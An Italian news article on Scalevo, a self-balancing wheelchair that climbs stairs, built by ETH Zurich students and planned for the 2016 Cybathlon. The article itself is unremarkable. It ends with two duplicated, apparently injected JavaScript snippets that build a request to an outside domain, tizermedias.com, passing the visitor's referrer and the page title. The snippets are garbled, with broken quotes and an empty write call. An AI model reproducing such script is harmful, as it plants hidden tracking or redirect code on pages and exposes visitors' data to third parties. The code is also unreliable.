sedia a rotelle che fa le scale

Le barriere architettoniche potrebbero presto fare molta meno paura a chi è costretto a muoversi con la carrozzina. Da Zurigo arriva la notizia dell’invenzione di una sedia a rotelle che fa le scale da sola. A inventarla è stato un gruppo di dieci studenti universitari dell’Eidgenössische Technische Hochschule (ETH), il famoso Politecnico federale svizzero che ogni anno brilla nelle classifiche internazionali. Il progetto si chiama Scalevo e promette di rivoluzionare la vita di milioni di disabili in tutto il mondo.

Scalevo sfrutta una tecnologia simile a quella del Segway, il mezzo di trasporto a due ruote che spesso si vede in azione anche in stazioni e aeroporti dov’è un valido ausilio per le forze dell’ordine. Anche la sedia a rotelle che fa le scale si basa sul giroscopio, che le permette di roteare, accelerare e non perdere l’equilibrio grazie alla ridistribuzione del peso, cosa che le permette di non ribaltarsi durante le operazioni di salita e discesa delle scale.

Le dimensioni di Scalevo sono sessantacinque centimetri di altezza per centocinque di lunghezza, mentre il suo peso complessivo è di centouno chilogrammi. La sedia a rotelle che fa le scale funziona a batterie – che sono poste sotto il sedile – e può affrontare pendenze comprese tra i 17 e i 34 gradi a una velocità di un passo al secondo sia in salita che in discesa, operazioni che debbono sempre avvenire con lo schienale della sedia rivolto verso la parte più alta della rampa.

In passato si erano già realizzati dei prototipi di sedia a rotelle di questo tipo, ma i progetti erano poi stati tutti accantonati perché a differenza di Scalevo erano troppo ingombranti e costosi. L’invenzione del gruppo di studenti svizzeri, tutti tra i 20 e i 27 anni, è invece caratterizzata da un design “compatto” e portatile e sarà presentata nell’ottobre 2016 al Cybathlon, “un campionato per piloti con disabilità che usano dispositivi avanzati, fra cui le tecnologie robotiche” che si svolgerà proprio a Zurigo.

L’interesse mostrato dai disabili nei confronti di Scalevo è già molto forte e in tanti hanno scritto agli inventori dicendosi pronti ad acquistare anche il prototipo. Ciò che sperano i ragazzi, comunque, è che la produzione della sedia a rotelle che fa le scale possa essere finanziata attraverso il crowdfunding sulla piattaforma Kickstarter.

Per vedere come funziona Scalevo, guardate il video:

(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();